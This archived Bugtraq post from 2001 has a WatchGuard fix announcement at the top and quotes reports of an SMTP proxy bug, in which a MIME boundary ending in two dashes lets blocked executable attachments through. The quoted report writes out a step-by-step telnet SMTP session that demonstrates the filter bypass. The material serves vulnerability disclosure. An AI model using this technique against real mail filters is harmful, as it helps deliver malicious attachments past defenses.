Home page logo
/

bugtraq logo Bugtraq mailing list archives

RE: WatchGuard SMTP Proxy issue
From: Steve Fallin <Steve.Fallin () watchguard com>
Date: Thu, 28 Jun 2001 15:00:46 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On June 8, Dante Mercurio sent word of a bug (below) in the WatchGuard
SMTP proxy originally reported to the WG-Users list by Thomas Boll.
MIME type filtering could be bypassed if an attachment was encoded
with base64 encoding and two dashes were appended to the MIME boundary
specifier. This bug has been fixed for the latest version of the code
(4.61). All current LiveSecurity subscribers can go to
http://www.watchguard.com/support to obtain the service pack that
addresses this bug (4.61 SP1). 


Sincerely, 
Steve Fallin
Director, Rapid Response Team
WatchGuard Technologies, Inc. 

- -----Original Message-----
From: Dante Mercurio [mailto:dmercurio () ccgsecurity com]
Sent: Friday, June 08, 2001 1:27 PM
To: BUGTRAQ () securityfocus com
Subject: WatchGuard SMTP Proxy issue


The WatchGuard firebox has an SMTP proxy that allows for the exclusion
of attachments by MIME type and by file extension. It has been found
that under certain conditions, this feature can be overridden,
allowing
files such as executables and VB script through the filter.

A customer of mine originally reported a problem on 12/19/00 with
WatchGuard case #255345. This was on version 4.5 of their LiveSecurity
software. On 5/27/01 Thomas Boll sent the following to the WG support
forum:

-----Original Message-----
From: Thomas Boll [mailto:tb () boll ch]
Sent: Sunday, May 27, 2001 7:13 PM
To: 'wg-users () watchguard com'
Cc: 'krol () ssr ch'
Subject: [WG-Users] SMTP Vulnerability!


Hi List

Users have reported that attachments blocked by file extension
make it through the SMTP Proxy even if the file extension is
on the blocked list (WG 4.6).

After some testing I believe that the MIME boundary is responsible
for the SMTP Proxy to fail. If the MIME boundary ends in two dashes
the Proxy will not correctly identify the attachment. This seems to
be typical for Free BSD based systems. This behaviour can be simply
tested on any firewall using the SMTP Proxy denying some attachments
based on the filename. Consider the two examples at the end 
of this message.

The reason seems to be obvious, two dashes end the MIME 
container, which
leads to a misinterpretation of the SMTP proxy. 

Regards
Thomas

==============================================================
=========

# telnet smtpserv 25
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xx.
Escape character is '^]'.
220 SMTP service ready
helo mydomain.com
250 Requested mail action okay, completed
mail from: me () mydomain com
250 Requested mail action okay, completed
rcpt to: me () smtpserv mydomain com
250 Requested mail action okay, completed
data
354 Start mail input; end with <CRLF>.<CRLF>
Content-Type: multipart/mixed; boundary="--sugus"

----sugus
Content-Type: application/octet-stream; filename="Calc.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Calc.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
.
250 Requested mail action okay, completed

=====> THE ANSWER IS CORECT AS IN:
---------------------------------------------------------------
From me () mydomain com  Mon May 28 00:46:37 2001
Return-Path: <me () mydomain com>
Delivered-To: me () smptserv mydomain com
Content-Type: multipart/mixed; boundary="--sugus"
Date: Mon, 28 May 2001 00:45:54 +0200 (CEST)
From: mw () mydomain com

----sugus
Content-Type: text/plain; charset=us-ascii

[Attachment denied by WatchGuard SMTP proxy (type 
"application/octet-stream", filename "Calc.exe")]


==============================================================
============
If however the boundary ends in --, the check will fail:


.....
Content-Type: multipart/mixed; boundary="--sugus--"

----sugus--
Content-Type: application/octet-stream; filename="Calc.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Calc.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
.
250 Requested mail action okay, completed
  

THE RESULT IS WRONG NOW:

----sugus--
Content-Type: application/octet-stream; filename="Calc.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Calc.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
...

=================================================================
=========
For help or to subscribe/unsubscribe, send mail to:
wg-users-request () watchguard com, with the word "subscribe", 
"unsubscribe"
or "help" in the body of the message.


Versions 4.5 and 4.6 have been tested and confirmed vulnerable. It is
unknown if other versions are vulnerable also.

M. Dante Mercurio, CCNA, MCSE+I, CCSA
Consulting Services Manager
Continental Consulting Group, LLC
www.ccgsecurity.com <http://www.ccgsecurity.com> 
dmercurio () ccgsecurity com <mailto:dmercurio () ccgsecurity com> 

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQA/AwUBOzupGk3Vi9lbkWzpEQLFdgCfR0ND15usVKG2aUC3e+0j8IBqU5gAn0j5
IIuHEp+UNN2GAejfeKB6K9Nd
=T9X0
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]